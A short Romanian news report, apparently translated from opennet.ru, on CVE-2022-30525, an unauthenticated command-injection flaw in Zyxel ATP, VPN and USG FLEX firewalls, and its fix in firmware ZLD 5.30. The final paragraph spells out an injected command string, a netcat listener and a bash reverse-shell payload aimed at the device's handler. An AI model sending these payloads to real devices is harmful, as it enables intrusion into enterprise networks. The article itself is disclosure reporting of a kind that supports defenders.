Vulnerabilitatea în firewall-urile Zyxel care permite executarea codului fără autentificare

O vulnerabilitate critică (CVE-2022-30525) a fost identificată în dispozitivele Zyxel din seria ATP, VPN și USG FLEX, concepute pentru a organiza funcționarea firewall-urilor, IDS și VPN în întreprinderi, ceea ce permite unui atacator extern să execute cod pe dispozitiv fără drepturi de utilizator fără autentificare. Pentru a efectua un atac, un atacator trebuie să poată trimite cereri către dispozitiv folosind protocolul HTTP/HTTPS. Zyxel a remediat vulnerabilitatea din actualizarea firmware-ului ZLD 5.30. Potrivit serviciului Shodan, în prezent există 16213 dispozitive potențial vulnerabile în rețeaua globală care acceptă cereri prin HTTP/HTTPS.

Operarea se realizează prin trimiterea de comenzi special concepute către handlerul web /ztp/cgi-bin/handler, accesibil fără autentificare. Problema este cauzată de lipsa curățării adecvate a parametrilor de solicitare la executarea comenzilor pe sistem folosind apelul os.system folosit în biblioteca lib_wan_settings.py și executat la procesarea operației setWanPortSt.

De exemplu, un atacator ar putea trece șirul „; ping 192.168.1.210;" ceea ce va duce la executarea comenzii „ping 192.168.1.210” pe sistem. Pentru a obține acces la shell-ul de comandă, puteți rula „nc -lvnp 1270” pe sistemul dumneavoastră și apoi inițiați o conexiune inversă trimițând o solicitare către dispozitiv cu „; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Sursa: opennet.ru

Adauga un comentariu